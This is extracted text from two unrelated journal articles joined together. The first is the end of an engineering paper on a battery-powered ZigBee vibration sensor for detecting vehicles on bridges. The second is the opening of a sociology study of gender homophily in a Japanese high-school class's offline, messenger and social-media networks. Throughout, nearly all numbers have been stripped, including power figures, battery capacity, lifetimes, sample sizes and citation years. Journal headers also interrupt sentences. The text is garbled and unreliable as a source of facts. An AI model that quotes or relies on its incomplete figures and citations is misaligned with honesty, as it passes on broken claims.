there are two sensors: a spring switch and an acceleration sensor. if no vehicle is passing, the system sleeps deeply to save power. when a vehicle passes, the spring switch wakes up the cpu and the acceleration sensor starts collecting data. with regard to processor power consumption, the terminal uses the cc chip for zigbee communication. because the chip integrates an mcs core processor, power consumption is reduced without an additional processor. the processor's computational ability is relatively low, so signal filtering and recognition are performed by the server; the detection terminal is responsible only for signal acquisition and communication. in this paper, a micro-power vehicle vibration detection terminal is designed, which uses dual sensors to reduce power consumption, zigbee wireless communication, and battery power supply. at the same time, communication reliability is guaranteed and low power consumption is maintained by waking up the radio at fixed times. the detection terminal can therefore meet the requirements of long-term maintenance-free operation. ii. principle when vehicles cross the bridge, the vibration they cause in the bridge deck is much stronger than the vibration they cause in the ground. therefore, this paper obtains vehicle information by detecting the vibration of the bridge deck. when no vehicle is passing, the detection terminal is in a deep sleep state: the cpu sleeps, and the acceleration sensor and data memory are powered off, thus saving electricity. once a vehicle passes by, the bridge vibration triggers the spring switch and wakes up the cpu, the power switch closes the supply, the acceleration sensor starts to measure the bridge deck vibration amplitude, and the data is stored in memory. when the zigbee network transmits data, enough routing nodes need to be awake. therefore, to ensure that the zigbee nodes work simultaneously, the terminal uses periodic wake-up. during the wake-up period, data is transmitted to the server for processing and identification. iii. low power implementation to permit battery power supply and maintenance-free long-term use, the terminal must reduce power consumption. this paper addresses low power consumption from three aspects: hardware, communication, and software. the hardware is designed with dual sensors, a low-power cpu, power switches, and unnecessary devices shut down during sleep. zigbee is used for communication because its ad hoc networking allows low-power relay transmission of data. to achieve low power consumption without losing information, the software uses external interrupts for data acquisition and timed wake-up for communication. iv. hardware architecture figure : hardware structure. figure : switch structure. the overall hardware structure is shown in figure . the spring switch is connected to the external interrupt pin of the cpu. when no vehicle passes by, the spring switch breaks the circuit, no current flows, and the power consumption of the spring switch is zero. when a vehicle passes by, the spring switch triggers the interrupt and wakes up the cpu. the structure of the spring switch is shown in figure : the center is a wire and the surrounding is a spring; vibration causes a short circuit between the spring and the wire, thus triggering the external interrupt of the cpu.
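the duty-cycle reasoning above (deep sleep until the spring switch fires an interrupt, sampling while vehicles pass, and a short periodic zigbee window) can be made concrete with a rough power-budget estimate. the following python sketch is only a behavioural model under assumed numbers; every constant in it is an illustrative placeholder, not a measurement from this article.

```python
# Rough duty-cycle power budget for a wake-on-vibration terminal.
# All constants are assumed placeholder values, not the article's measurements.

SLEEP_MW = 0.05      # deep sleep, sensors powered off (assumed)
ACQUIRE_MW = 30.0    # CPU + accelerometer while a vehicle passes (assumed)
RADIO_MW = 90.0      # ZigBee window: join the network and upload data (assumed)

def average_power_mw(acquire_min=30, radio_min=10):
    """Average power over one day, given minutes spent in each active state."""
    total_min = 24 * 60
    sleep_min = total_min - acquire_min - radio_min
    return (SLEEP_MW * sleep_min + ACQUIRE_MW * acquire_min
            + RADIO_MW * radio_min) / total_min

def battery_life_days(capacity_ah=8.0, voltage_v=3.6, derating=0.8):
    """Derated lithium-cell energy divided by the daily energy consumption."""
    energy_mwh = capacity_ah * 1000 * voltage_v * derating
    return energy_mwh / (average_power_mw() * 24)

print(f"average power = {average_power_mw():.2f} mW, "
      f"estimated life = {battery_life_days():.0f} days")
```

with these placeholder figures the estimate lands in the region of two years of operation, which is the kind of calculation the conclusion of the article performs with its measured values.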
vibration sensor adopts three-axis acceleration sensor. when the cpu is dormant, the vibration sensor is international journal of advanced network, monitoring and controls volume , no. , disconnected to save power. when the cpu is awakened, the acceleration sensor is energized and starts to work. the clock is powered by a single battery using a ds chip. the memory uses at df to store the data of acceleration sensor temporarily, waiting for the arrival of the next communication cycle. the battery uses a disposable lithium battery with a capacity of ah and a voltage of . v. the communication adopts zigbee wireless mode. in order to save power, instead of increasing the cpu, the data acquisition and communication are carried out by using the single chip microprocessor core integrated with cc . the power supply control is realized by electronic programmable switch adg , which can realize the maximum ma current output capacity, short switching time and low power consumption. v. overview of zigbee network establishment establishing a complete zigbee mesh network consists of two steps: network initialization and node joining the network. there are two steps for a node to join the network: to connect to the network through a coordinator and to access the network through an existing parent node. a. initialize network coordinator firstly, it judges whether the node is a ffd node, and then it judges whether the ffd node has a coordinator in other networks or in other networks. through active scanning, send a beacon request command, and then set a scan duration . if no beacon is detected during the scan period, then ffd has no coordinator in its pos, then it can establish its own zigbee network, and as the coordinator of this network, it generates beacons continuously and extensively. broadcast. in a network, there is only one coordinator. initialize network coordinators shown in figure . figure . initialize network coordinator b. channel scanning process it includes two processes: energy scanning and active scanning. firstly, it detects the energy of the designated channel or the default channel to avoid possible interference. channels are sequenced incrementally to discard those channels whose energy values exceed the allowable energy level. channels with allowable energy level are selected and labeled as available channels. then active scanning is carried out to search the network information within the communication radius of the node. these messages are broadcast in the form of beacon frames in the network. nodes obtain these beacon frames through active channel scanning. then, according to these information, they find the best and relatively quiet channel. through recording results, they select a channel, which should have the least zigbee network, preferably without zigbee devices. during active scanning, the mac layer discards all frames received by the phy layer data service except beacons. international journal of advanced network, monitoring and controls volume , no. , c. set up the network id when the appropriate channel is found, the coordinator will select a network identifier (pan id, value (= x fff) for the network. this id must be unique in the channel used, cannot conflict with other zigbee networks, and cannot be used as the broadcast address xffff (this address is reserved address, can not be used). 
pan ids can be obtained by listening to the ids of other networks and selecting a non-conflicting id, or by artificially specifying the scanning channels to determine the pan ids that do not conflict with other networks. there are two address modes in zigbee network: extended address ( bits) and short address ( bits), where extended address is allocated by ieee organization for unique device identification; short address is used for device identification in local network. in a network, the short address of each device must be unique. when a node joins the network, it is allocated by its parent node and communicated by using short address. for coordinators, the short address is usually set to x . after the above steps are completed, the zigbee mesh network is successfully initialized, and then waiting for other nodes to join. when the node enters the network, the parent node (including the coordinator) with the strongest signal in the range of choice will join the network. after success, it will get a short address of the network and send and receive data through this address. the network topology and address will be stored in their flash. d. nodes join the network through coordinator when the node coordinator is determined, the node first needs to establish a connection with the coordinator to join the network. in order to establish a connection, ffd nodes need to make a request to the coordinator. after receiving the connection request, the coordinator decides whether to allow the connection, and then responds to the node requesting the connection. only when the node and the coordinator establish a connection, can the data be sent and received. the specific process of node joining the network can be divided into the following steps: nodes join the network is shown in figure . figure . nodes join the network e. find the network coordinator firstly, the coordinator of the surrounding network will be scanned actively. if the beacon is detected within the scanning period, the relevant information of the coordinator will be obtained, and then a connection request will be sent to the coordinator. after selecting the appropriate network, the upper layer will request the mac layer to set the pib attributes of phy and mac layer, such as phycurrent channel and macpanid. if not detected, after a period of time, the node re-initiates the scan. international journal of advanced network, monitoring and controls volume , no. , f. send the associate request command the node sends the association request command to the coordinator. the coordinator replies to an acknowledgment frame (ack) immediately after receiving it, and sends the connection instruction primitive to its upper layer to indicate that the connection request of the node has been received. this does not mean that a connection has been established, but only that the coordinator has received a connection request from the node. when the upper mac layer of the coordinator receives the connection instruction primitive, it will decide whether to grant the join request of the node according to its own resource (storage space and energy), and then send a response to the mac layer of the node. g. wait for the coordinator to process when the node receives ack from the coordinator to join the association request command, the node mac will wait for a period of time to receive the coordinator's connection response. if a connection response is received within a predetermined time, it notifies its upper layer of the response. 
when the coordinator sends a response to the mac layer of the node, it sets a waiting response time (t_response waittime) to wait for the coordinator to process the request command. if the coordinator has enough resources, the coordinator assigns a -bit short address to the node and generates a connection response command containing the new address and the successful status of the connection, then the node will succeed in building the coordinator. vertical connection and start communication. if the coordinator resources are insufficient, the nodes to be joined will resend the request information and enter the network successfully. h. send data request commands if the coordinator agrees to join the node in response time, the associate response command is generated and stored. when the response time is over, the node sends the data request command to the coordinator. the coordinator replies to the ack immediately after receiving the command, and then sends the stored related response command to the node. if the coordinator hasn't decided whether to agree to join the node after the response time arrives, then the node will try to extract the related response command from the beacon frame of the coordinator. if successful, the network can be accessed successfully. otherwise, the request information will be re-sent until the network is successfully accessed. i. reply when the node receives the correlation response command, it immediately replies an ack to the coordinator to confirm that it receives the connection response command. at this time, the node will save the short address and extended address of the coordinator, and the mlme of the node sends the connection confirmation primitive to the upper layer to notify the success of the association. j. nodes join the network through existing nodes when the ffd nodes close to the coordinator are successfully associated with the coordinator, the other nodes within the scope of the network join the network with these ffd nodes as their parent nodes. there are two ways to join the network, one is through association, that is, the joining nodes initiate joining the network; the other is direct, that is, the joining nodes. the volume is added to that node as a child of that node. the association mode is the main way for new nodes to join the zigbee network. for a node, only if it has not joined the network can it join the network. some of these nodes have joined the network but lost contact with their parents (such as orphan nodes), while others are new nodes. when an orphan node is an orphan node, the information of the original parent node is stored in its adjacent table, so it can send the request information of the original parent node to join the network directly. if the parent node has the ability to consent to its joining, it will enter the network successfully by directly telling its previously international journal of advanced network, monitoring and controls volume , no. , assigned network address; if the number of child nodes in its original parent node's network has reached the maximum, that is to say, the parent node can not approve its joining, it can only find and join the network as a new node. for a new node, it first scans the network it can find on one or more pre-set channels actively or passively, searches for the parent node that has the ability to authorize itself to join the network, and stores the data of the parent node that can be found in its adjacent table. 
data stored in parent nodes of adjacent tables includes zigbee protocol version, protocol stack specification, pan id and information that can be added. choose one of the smallest parent nodes in the adjacent table and send a request message to it. if there are more than two parent nodes with the same minimum depth, then randomly select one to send the request. if there is no suitable parent information in the adjacent tables, it means that the access process fails and terminates. if the request is approved, then the parent node will also allocate a -bit network address, at which time the network entry is successful, and the child node can start communication. if the request fails, look up the adjacent table again and continue sending the request information until joining the network. vi. software design a. introduction to working schedule the software work schedule is shown in figure . data is transmitted by relay mode to achieve low power consumption. therefore, in order to transmit data, it is necessary to wake up all nodes at the same time. the communication wake-up period is t. the selection of t value is based on the size of ram capacity, the frequency of vehicle passing and the real-time requirement of data transmission. in each cycle, once a vehicle passes by, the sensor collects data, and the cpu stores the data in ram. after data acquisition, it enters a deep dormant state, waiting for the next vehicle to pass or the next communication wake-up cycle. figure . software work schedule b. flow chart brief introduction the system software mainly consists of three parts: main function, data acquisition function and communication function. the main function mainly completes the setting of startup parameters and entering the dormant state. data acquisition function uses external interrupt wake-up. communication function uses timer interrupt wake-up. the main function is relatively simple, and it is no longer necessary to elaborate. the following is a brief introduction of the two interrupt functions. the flow chart of the data acquisition function is shown in figure . when the vehicle passes by, the vibration switch is triggered and the cpu enters the external interrupt function. after external interruption wakes up the cpu, the power supply of each device is turned on through adg , and the data of acceleration sensor is collected, which is temporarily international journal of advanced network, monitoring and controls volume , no. , stored in the data memory. the terminal collects data and keeps it until no vehicle passes by. after all the vehicles passed, the cpu turned off the power through adg , and the terminal went to sleep. the communication function is shown in figure . when the communication time arrives, the timer wakes up the cpu, detects the wireless signal, and waits for the central node to be ready. after zigbee is successfully networked, each terminal uploads data in turn. if the network is idle after the transmission is completed, it will enter a dormant state. if there is no vehicle passing in the communication process, the sensor power supply need not be turned on. figure . data acquisition function figure . communication function vii. conclusion after the prototype is completed, it is placed outdoors for power consumption test. the outdoor ambient temperature ranges from - c to c, and the relative humidity ranges from % to %. 
in order to better simulate the vehicles and environment on site, data acquisition was carried out under a viaduct deck during its construction period; the weight and speed of construction vehicles are closer to those of the target field vehicles than those of ordinary household cars. the average power consumption under different working conditions is: no more than . mw in the dormant state, mw while a vehicle is passing, and mw during communication. the total energy consumed over a whole day is mwh, based on minutes of vehicle passing time and minutes of communication. the selected battery is ah, . v, with a total energy of . wh. considering factors such as battery self-discharge, conservative estimates indicate that the terminal can work for days, meeting the initial design requirement that the equipment work for at least two consecutive years. the data packet loss rate of the wireless communication is less than %, and the long-term equipment failure rate has not yet been tested. this paper designs a micro-power bridge-deck vibration detection terminal that uses wireless zigbee communication, supports flexible networking and long-distance low-power transmission, and controls the power consumption of the hardware so as to achieve micro-power operation. experiments show that a disposable lithium battery can support operation for more than two years. the detection terminal offers strong concealment and simple construction, so it has good prospects in frontier monitoring and battlefield perception. acknowledgment fund name: national and local joint engineering laboratory of new network and test control. fund number: gsysj . connections issue | vol. article | doi: . /connections- . comparing gender homophily among the multilayer media social networks of face-to-face, instant messenger and social networking services: a case study of a high school classroom naoki maejima the university of tokyo, graduate school of humanities and sociology, tokyo, japan. e-mail: malimo @gmail.com received for publication january , . abstract in which social worlds does gender homophily operate more strongly – offline or online? to address this question, the following two aspects must be considered. first, people currently use many types of online communication media.
second, to examine the homophily effects exclusively, it is necessary to control for other network formation mechanisms such as ‘foci’ and ‘triadic closure.’ for this study, i conducted mixed-method research in a high school in rural japan. i asked students who they interacted with face-to-face (f f), through instant messenger (im), and through social networking services (sns), and then analyzed the social networks using exponential random graph models (ergms). subsequently, i conducted semi-structured interviews to uncover the practices and social contexts of each communication medium and to explain the results of the quantitative analysis. the results showed that sns was more gender heterogeneous than offline. in the im network, a small gender homophily effect was initially observed; however, three months later, its strength had decreased to almost the same level as in the sns network. from the qualitative research, some key mechanisms producing the difference in gender homophily are specified, such as the precedence of f f communication over im interaction, the independence of sns communication from f f, recommending functions, and hobby homophily. overall, this study implies that considering offline or online alone may cause misunderstanding regarding homophily in organizations, because the observed strength of homophily effects depends on whether the space examined is offline or online, what kind of media is examined, and when the online social network data are collected. keywords homophily, social media, multilayer networks, exponential random graph models. homophily is defined as ‘the principle that contact between similar people occurs at a higher rate than among dissimilar people’ (mcpherson et al., , p. ). this principle is universally observed in a wide variety of social networks. currently, social interactions occur in both offline and online spaces. this raises an important question: are there differences in homophily between offline and online spaces within a single social group? although many preceding studies have examined homophily in both offline and online spaces, few have examined the differences in homophily between these spaces in small social groups such as classrooms and workplaces. after the emergence of social networking services (snss) such as twitter and facebook, social connections offline and online have become more dependent, continuous, and multiplexed (boyd and ellison, ; ellison et al., ). it is becoming increasingly difficult to understand our social networks by researching offline or online interaction alone. if there is a difference in the strength of homophily between offline and online social networks, studies of homophily that examine only the offline or online environment will fail to depict the strength of homophily in a social group. in this study, i aim to reveal the differences in gender homophily among communication media through a case study of a high school classroom. to address the ‘offline vs. online’ question in a modern setting, it is necessary to consider that nowadays people use multiple online media tools such as instant messenger (im) and snss. the present study distinguishes between online communication via im and snss and compares the homophily mechanisms in each network with the face-to-face (f f) network.
although they are created before the emergence and development of snss, some computer-mediated communication (cmc) theories predict that online communication filters ‘social cues’ and alleviates the social norms that constrain social interactions. moreover, it can be assumed that online spaces generate a unique social identity between individuals who share the same offline membership, such as a classroom or workplace. in online spaces, people are less constrained by social norms than offline spaces when they interact with each other, and they foster a feeling of similarity if they belong to the same social group, which would promote social interaction among them regardless of social attributes such as gender. therefore, i argue that online social networks are more heterophilic than offline social networks. furthermore, i also expect that there is a difference in the strength of gender homophily between online media, and i hypothesize that the sns network layer is more heterophilic than the im network layer. snss such as facebook are often used for maintaining offline friendship (ellison et al., ) and offer messaging functions like im. however, snss form ‘networked publics’ (boyd, ), which contain many other unknown users on the same platform and offer them access to the users’ contents through networked technology such as searching, sharing, or retweeting. in such a situation, compared to im, individuals find and meet their friends with a common offline membership, which can foster a stronger group identity among them. in this study, homophily is regarded as individuals’ preference to form social ties with others who have similar social attributes. it is necessary to distinguish homophily as a process of tie formation in the network and a joint outcome of various mechanisms including ‘foci’ or ‘triadic closure’ which can also induce network homogeneity (wimmer and lewis, ). the foci mechanism suggests that common activities such as club activities are essential for tie formation across communication media. the triadic closure mechanism proposes that friends of friends are likely to be friends. to distinguish the strength of homophily from these other network formation mechanisms, the present study applies exponential random graph models (ergms) to media multilayer social networks. finally, in addition to quantitatively testing hypo- theses, through qualitative research, this study also tries to identify some social practices and mechanisms that produce differences in homophily in each network layer. homophily in offline and online social networks homophily in offline social networks in offline spaces such as high school classrooms, social segregation by gender, age, race/ethnicity, and extra-curricular activities is often observed (kandel, ; shrum et al., ; moody, ; mouw and entwisle, ; goodreau et al., ; wimmer and lewis, ; leszczensky and pink, ). for example, shrum et al. ( ), from a large-scale study of , schoolchildren, grades to in the southern united states, revealed that for the third grade, about two-thirds of the expected counts of cross-race ties were not observed, and for the sixth grade, % of the expected counts of cross-gender ties were missing. social segregation in an organization is a result of complex network formation mechanisms. 
it has been noted that segregation is caused not only by the preference to form social ties with who have similar social attributes to them, foci (i.e., involving the same community or activity induces tie formation) and triadic closure (i.e., friends of friends tend to be friends) affect segregation (goodreau et al., ; wimmer and lewis, ). without considering these features, homophily effects could be overestimated. homophily in online social networks at the same time, there is a large number of studies on homophily on online media. here, ‘online media’ connections refers to a wide range of digital communication tools on the internet, such as e-mail, newsgroups, instant messengers, myspace, facebook, twitter, and so on. recently, it has been pointed out that snss tend to connect homogeneous actors and cause ‘echo chamber’ problems (colleoni et al., ). for example, conover et al. ( ) reveal that, by analyzing over , tweets during the u.s. congressional midterm elections on twitter, retweets networks containing political messages are highly segregated, where left- and right-leaning users are sparsely connected with each other. however, some studies suggest that online media alleviate social segregation. in the early stages of the internet, the online world was proposed to be a ‘virtual community’ (rheingold, ) – an independent, free, and progressive utopia (barlow, ). therefore, research on online social networks emphasizes the liberty and diversity of the online world (parks and floyd, ; kendall, ). parks and floyd ( ) researched users of ‘usenet,’ one of the oldest and most popular computer networks before the spread of the world wide web and hosted wide-ranging newsgroups. they found that about two-thirds of users made personal connections with people they first met on the newsgroup. parks and roberts ( ) claimed that, on a moo (a text-based virtual space), . % of social relations were cross- gender ties. in a more modern setting, another study analyzed friends’ communication in myspace, one of the earliest snss, and found no gender homophily effects (thelwall, ). in another example, laniado et al. ( ) analyzed the case of ‘tuenti,’ a spanish sns, mainly focusing on homophily differences between men and women, and found that gender homophily was stronger among women than men, and the rates of same-sex friends of both genders were lower than those of offline studies. multilayer media social networks however, these previous studies considered only one layer of social networks. this is problematic given the modern media environment. since the emergence of snss such as twitter and facebook, social connections offline and online have become more dependent, continuous, and multiplexed (boyd and ellison, ; ellison et al., ). in a web survey of undergraduate students (n = ), ellison et al. ( ) found that facebook was used to contact old friends and maintain social connections that originated at offline parties or with classmates. in this manner, the internet changed from a place for strangers to meet to a tool for already acquainted people to become friends. since individuals today not only interact with others face-to-face but also through various communication media, such as im or snss, social ties with others are created on diverse media simultaneously. therefore, the whole social network should be treated as a multilayer media network (haythornthwaite, , ; kivelä et al., ). it becomes increasingly difficult to understand our social networks researching offline or online alone. 
if this aspect of modern communication is not considered, research on social networks would draw the wrong image about homophily. a few studies have examined such multilayer media networks. for example, igarashi et al. ( , ) studied f f interactions and mobile phone text messaging (mptm), including both e-mail and short message service (sms), obtained from a survey of first-year undergraduate students. specifically, they investigated the whole network of each layer and quantified gender homophily as the network formation principle in each layer. baym and ledbetter ( ), from a survey of users of a music-sharing website called ‘last.fm’, found that connections on the platform were more likely to be cross-gender compared to connections face-to-face or through phone calls and other websites. in another example, hristova et al. ( ) compared the network structure between facebook and offline social networks to assess the heterophily of political opinions and homogeneity of school year in online networks. however, these studies examined only a small part of the multilayer media or did not consider structural effects such as foci or triadic closure. to address the ‘offline vs. online’ question in terms of homophily, we must consider two factors. first, people use various types of communication media. although hristova et al. ( ) regarded facebook as ‘online’ media, this category intrinsically includes diverse electronic communication media. moreover, it is a misleading categorization when the homophily effect of various communication media is also not evaluated concurrently. second, to evaluate the effect of homophily exclusively, it is necessary to control other network formation mechanisms such as foci (feld, ) and triadic closure (goodreau et al., ; wimmer and lewis, ). there is a huge difference between ‘homophily’ and ‘network autocorrelation’ (feld and grofman, ). ‘homophily’ is an expression of personal preferences, while ‘network autocorrelation’ is the trend of ‘linking among similar,’ which is caused by various mechanisms such as belonging to the same homogeneous community. gender homophily in multilayer media social networks gender homophily the current research specifically focuses on gender homophily. in a review study, mehta and strough ( ) claimed that gender homophily exists across the entire lifespan. in an offline situation, stehlé et al. ( ) examined gender homophily among primary school students based on network data measured in a primary school in france over two days, using wearable devices that recorded proximity among students. as a result, gender homophily was ob- served in every grade. gender segregation, which is caused by gen- der homophily, produces various outcomes for in- dividuals and networks. kalmijn ( ) claimed that gender segregation affects outcomes in at least three ways. first, gender segregation is important because it creates gender stereotypes and strengthens traditional gender roles. second, it prevents people from understanding each gender and makes romantic relationships more complex. third, interactions of both genders enhance the social capital of women. based on fieldwork in a high school classroom in japan, the present study examines differences in the degree of gender homophily among various social network layers of communication media, considering, as mentioned above, network mechanisms such as foci and triadic closure. 
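to make the distinction between a homophily preference and foci-induced network autocorrelation concrete, the short simulation below is offered as a hypothetical illustration (the club names, membership probabilities, and counts are invented and do not come from any study cited here). it shows how gender-skewed foci alone can generate an excess of same-gender ties even when tie formation is completely indifferent to gender, which is exactly the confound that the models used later in this study control for.

import random

random.seed(0)

N_STUDENTS = 40
# hypothetical clubs with different gender compositions: value = probability that a member is female
CLUBS = {"brass band": 0.8, "rugby": 0.1, "drama": 0.7, "baseball": 0.15}

students = []
for i in range(N_STUDENTS):
    club = random.choice(list(CLUBS))
    gender = "F" if random.random() < CLUBS[club] else "M"
    students.append({"club": club, "gender": gender})

# ties form only through a shared focus (the club); gender plays no role at all
ties = []
for i in range(N_STUDENTS):
    for j in range(i + 1, N_STUDENTS):
        same_club = students[i]["club"] == students[j]["club"]
        if random.random() < (0.5 if same_club else 0.02):
            ties.append((i, j))

same_gender = sum(students[i]["gender"] == students[j]["gender"] for i, j in ties)
print(f"{same_gender / len(ties):.0%} of ties are same-gender, "
      "although no gender preference entered the tie-formation rule.")

in a run like this, well over half of the ties are typically same-gender, purely because the foci themselves are gender-skewed; an analysis that ignored foci would read this pattern as homophily.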
theory and hypothesis from several theories in computer-mediated commu- nication (cmc) studies, it can be predicted that the effect of gender homophily on a social network operates more weakly in an online world. note that the theories were made in the pre-sns period, when only text-based messaging media such as e-mail were available, and people communicated with anonymous others through these media. although in the post-sns period, people often use online media to maintain the relationship between friends who have already known each other, the theories still provide deep insight into homophily in offline and online social spaces. according to ‘reduced social cues theory,’ electronic media reduces social cues to infer the social contexts of others, including geographic lo- cation, affiliation, status, job, age, and gender. these media attenuate social cues available in face-to- face interaction, including non-verbal cues such as gestures, tone of voices, and facial expression to recognize social contexts (sproull and kiesler, ). since the lack of these non-verbal cues causes social anonymity, the effects of norms and standards of social groups on behavior are attenuated, facilitating anti-normative behaviors (kiesler et al., ). note that in the modern media environment, where people use online media to maintain the relationship between friends they already know, people know the social attributes of each other, and they are not perfectly anonymous because they experience meeting offline. however, when they interact in the im and snss, only a few non-verbal cues are available, which may lead to anti-normative behavior. for instance, when considering students in a classroom, the lack of cues in the online spaces, such as upset facial expressions of girls when a boy speaks to them and the gaze from others may facilitate inter-gender communication. reduced social cues theorists often think the relationships through cmc as they are impersonal and not useful for cultivating relationships, compared to face-to-face communication. although empirical studies based on reduced social cues theory focused on ‘flaming’, i.e. aggressive and hostile verbal behavior (kiesler et al., ), subsequent studies revealed that cmc can promote positive relationships as well as face-to-face communication through mechanisms such as long-term message exchange complementing the scarcity of social cues and selectively disclosing themselves (walther, , ). however, the perspective that technological features of online media weaken social norms regulating communication between people is insightful and informative to study homophily in the offline and online spaces in that they offer possibilities for network formation otherwise regulated by the norm in the offline space. taken together, this theory predicts that online communication media lead social networks toward lower levels of gender homophily. as it has long been widely known, cross-gender friendship is constrained by social norms (booth and hess, ). since the media reduces social cues and weakens the social norms that constrain social interactions in offline spaces, gender homophily is weaker in the online world. furthermore, in social spaces where people use multiple media and their connections overlap across various media, it is expected that offline membership will be similar to online encounters. 
the formation of online ties not biased by social attributes can be accounted for by ‘group identity’ because communication media enables users to communicate and produces a distinct identity. according to meyrowitz ( ), whether one associates with the same group identity as others depends on the connections specific situation. meyrowitz offers the following example: “any common experience, information, or role that separates two or more people from others will give them a sense of common identity. yet because social experience, information, and roles are situation-bound, group identities will change with variations in situations or with a shift in participants’ perspectives concerning “insiders” and “outsiders.” two new yorkers who meet in georgia may feel an immediate bond that unites them “against” georgians. at the same time, however, a georgian and a new yorker who meet in italy may feel a similar connection with each other because they are both american.” (meyrowitz, , p. ) as in this example, when students meet in the classroom (i.e., offline space), they take their setting for granted. however, if they meet online, they may feel ‘an immediate bond’ because they have the same group identity as classmates, which would promote interaction among them. thus, if individuals in the same social group encounter one another in an online space, social cues are reduced, and perceptions of similarity grow. this generates social ties among individuals, regardless of their social attributes. in other words, offline spaces themselves become ‘foci’ (feld, ) that densely connect people in online spaces. this can be specific to the modern multiplex- media situation. in addition, the difference in gender homophily among online media can be supposed. in particular, snss such as myspace and facebook have an aspect of ‘networked publics,’ which have the following three dynamics: ‘invisible audiences,’ ‘collapsed contexts,’ and ‘the blurring of public and private’ (boyd, ). as previously mentioned, most snss such as facebook use them to connect and maintain friendships with people whom they have already met offline. however, users can deliver or receive content from distant individuals through the network, and user profiles can be searched by other users. these distant audiences are invisible, but users are clearly conscious of their existence. teenage users of snss even attempt to prevent others from searching for them (boyd, ). therefore, snss offer more opportunities to find and recognize many strangers who do not share offline membership and foster group identity online more strongly than im. moreover, the functionality of snss can make gender homophily on snss weaker than im. snss often implement recommendation functions, which helps users to find other users who are likely to match them. this function promotes them to find and identify users who have the same offline membership because profiles that users input by themselves give clues to who an account is. furthermore, information on profiles may bring unexpected findings of similarity such as hobby or tastes, which promotes tie formation based on cultural matching, canceling out the gender homophily. based on this, regarding the ‘online vs. 
offline’ problem, i formed a two-part hypothesis concerning multiple online communication media: hypothesis a: in the sns social network layer, gender homophily operates more weakly than in the offline social network layer, and hypothesis b: in the im social network layer, gender homophily operates more weakly than in the offline social network layer. likewise, regarding the difference in gender homophily among online media, i hypothesized that in the sns social network layers, gender homophily operates more weakly than in the im social network layers (hypothesis ). to examine the two hypotheses, i evaluate the degree of homophily in each layer, comparing gender homophily in face-to-face versus online networks. data and methods in this study, i adopted a mixed-method framework that integrates qualitative and quantitative research methods. i analyzed the network structure of the observed social network using quantitative sta- tistical approaches. in addition, i captured the practices, meanings, processes, and other social contexts through a qualitative approach to interpret the statistical analysis. the research design of this study was a sequential explanatory design, which begins with quantitative data collection and analysis, followed by qualitative research to elaborate on the results of the quantitative analysis (teddlie and tashakkori, ; domínguez and hollstein, ). the results of the qualitative research were used to explain the results of the quantitative research, such as the differences in gender homophily effects between network layers. a series of surveys were conducted in a high school classroom in the rural region of chūbu, japan. the city’s central station can be reached by a super express train (also known as shinkansen) from tokyo. this city is one of the snowiest areas in japan, and skiing and snowboarding are popular in winter. the high school is located at the foot of the mountains. most students travel a great distance by train to reach the central station and then take buses, bicycles, etc., to the high school. there were approximately students in this school. the school is more academically advanced than many other schools in the prefecture, and most of the students go on to gender homophily in multilayer media social networks university. in the third grade, the students were busy studying for entrance examinations. the survey was conducted in a classroom with second-grade students. in japan, the second grade in high school is equivalent to the th grade in a us high school and year in a uk secondary school. the students’ ages were primarily or , with some exceptions (e.g., there were older students who had initially failed their high school entrance examinations.) quantitative research before conducting the research, i interviewed the class teacher in detail about the classroom. students rarely use e-mail but mainly use line to contact other students, and they have a group chat that almost all students in the classroom join. line is the most popular instant messaging application in japan. it can be seen as a representation of the various messaging apps because it has typical functions such as sending messages, creating group chat rooms, sharing pictures and videos, and using stickers and emoji, much like messaging apps popular in other countries, such as whatsapp, facebook messenger, and viber. 
as for sns usage, when classroom allocation was rearranged (when students advance from first to second grade in april, the classroom allocation is rearranged), some students advertised their usernames on twitter so that other students could follow their accounts. based on this information, i conducted a que- stionnaire survey on june (wave ) and september , (wave ). although this study’s scope is a cross-sectional status of homophily, i analyzed both waves. at this school, the class change took place in april for the second-grade students. by studying the results from the two waves, it was possible to determine whether there was a difference between the early stages of friendship formation within the class and three months later. conducting the research in two waves also verified the robustness of the results. the questionnaire consisted of three sections. the first section contained questions about the social attributes of students (e.g., ‘what is your gender?’), the second section contained questions about the media usage of students (e.g. ‘which messaging app do you install?’), and the third section contained questions about social networks among students (e.g. ‘who do you talk with?’). in the first section, i asked students about their gender, club activity, and academic courses. second, i asked if they had a mobile phone or not, which snss they use, and how many times they have used snss. finally, i asked with whom they talk in the classroom, with whom they communicate through instant messenger, and to whom they comment or reply and on which sns. in the social network module, i used a name generator based on the ‘recognition method’ (robins, ). although standard name generators ask for names of individuals who are related to the respondent, in this study, i asked for the roster number of each student in order to not record their names on the questionnaire and protect their personal information. although the network data to be collected in this study can be directed, the data were converted to undirected networks in the analysis. if at least one of the dyads recognizes the interaction, whether reciprocal or nonreciprocal, i converted it to an undirected tie with weight . the research interest of the present study is not in the informational flow or the recognition gap of social ties between males and females, but in the existence of social relationships itself. moreover, in the section of the questionnaire on social ties in f f and im, it asked ‘with whom’ rather than ‘to whom’, which limits the question to ‘interaction’ among students. if the recognition is not reciprocal, it only means that respondents could not recall the interaction. however, the question regarding social ties in sns, the question asks, ‘to whom they comment or reply’: i asked this question in this way because i believe that questions such as ‘who is the person you comment on and responds to your comments?’ is redundant and not easy for respondents to recall their social interactions. to evaluate the degree of homophily in each layer, it is necessary to consider other mechanisms of network formation. in particular, this study considers ‘foci’ and ‘triadic closure’ as important network- forming mechanisms. in the following sections, i elaborate on each mechanism in detail. foci to evaluate the degree of gender homophily more exclusively, it is necessary to consider foci mecha- nisms. 
‘foci’ (or singular ‘focus’) is defined as ‘a social, psychological, legal, or physical entity around which joint activities are organized (e.g., workplaces, voluntary organizations, hangouts, families, etc.)’ (feld, , p. ). shared foci provide opportunities to form ties within units, independent of preference to some extent (hallinan and williams, ). i consider foci to be a control variable because, in addition to homophily, it is predicted that students will have more social ties based on belonging to the same club or academic course. if there are gender differences in participation connections in club activities or academic courses and such foci effects were not controlled for, the true homophily effect could not be estimated because of the network autocorrelation caused by the effects of foci. in japanese high schools, club activities and academic courses are intended as important foci to connect students. club activity in junior high or high school is called bukatsu in japanese: bukatsu refers to ‘school club activities and to the clubs themselves, which are devoted not only to sports but also to music, art, science, and others’ (omi, , p. ). students in the same club are predicted to spend most of their school lives together because they practice their activities before and after school, on weekends, and during summer or winter vacations. therefore, it is natural that club activities operate as strong foci to connect students in the same bukatsu in both the classroom and the online world. in the case of this high school, there are two main types of bukatsu: sports and culture. sports clubs include tennis, baseball, rugby, swimming, athletics, and kendo. both girls and boys can join the same club, with some exceptions such as volleyball and basketball club, which are separated by gender (e.g., a girls’ volleyball club and a boys’ volleyball club). culture 